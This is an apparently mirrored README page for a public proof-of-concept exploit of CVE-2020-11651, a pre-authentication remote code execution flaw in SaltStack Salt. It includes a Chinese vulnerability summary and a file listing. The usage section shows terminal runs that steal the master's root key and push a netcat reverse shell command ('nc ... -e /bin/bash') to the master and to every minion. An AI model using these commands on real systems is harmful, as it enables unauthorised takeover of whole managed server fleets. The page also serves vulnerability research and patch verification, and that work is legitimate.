Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-11651 PoC — SaltStack Salt 安全漏洞

Source
https://github.com/dozernz/cve-2020-11651
Associated Vulnerability
Title:SaltStack Salt 安全漏洞 (CVE-2020-11651)
Description:SaltStack Salt是SaltStack公司的一套开源的用于管理基础架构的工具。该工具提供配置管理、远程执行等功能。 SaltStack Salt 2019.2.4之前版本和3000.2之前的3000.x版本中存在安全漏洞,该漏洞源于salt-master进程的ClearFuncs类没有正确验证方法的调用。远程攻击者可利用该漏洞检索用户令牌或执行任意命令。
Readme
# CVE-2020-11651

This is a POC for CVE-2020-11651, which obtains pre-auth RCE on a salt stack master, and/or all the associated minions. Some light details on the issue [are here](https://labs.f-secure.com/advisories/saltstack-authorization-bypass). POC for 2020-11652 not included. 

This obtains command execution on the master by creating a runner of salt.cmd with function cmd.exec_code. There's no interactivity implemented, youll need to catch a reverse shell. 

## Usage

Tested on Debian10 against a Debian10 instance. Needs ncat to receive and send a shell, and `pip3 install salt` library for transport.

```
user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 master 'nc 192.168.200.137 4444 -e "/bin/bash"'
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
Got response for attempting master shell: {'tag': 'salt/run/20200504080050593352', 'jid': '20200504080050593352'}. Looks promising!

user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 minions 'nc 192.168.200.137 4444 -e "/bin/bash"'
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
Sending command to all minions on master

user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 fetchkeyonly
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
user@debian10:~$ 

```

![saltstack](https://raw.githubusercontent.com/dozernz/cve-2020-11651/master/saltstack.PNG)
File Snapshot

 [4.0K]  /data/pocs/66e5d012a52932d01cd930acfc35d8ba0e425976
├── [4.2K]  CVE-2020-11651.py
├── [2.4K]  README.md
└── [ 57K]  saltstack.PNG

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.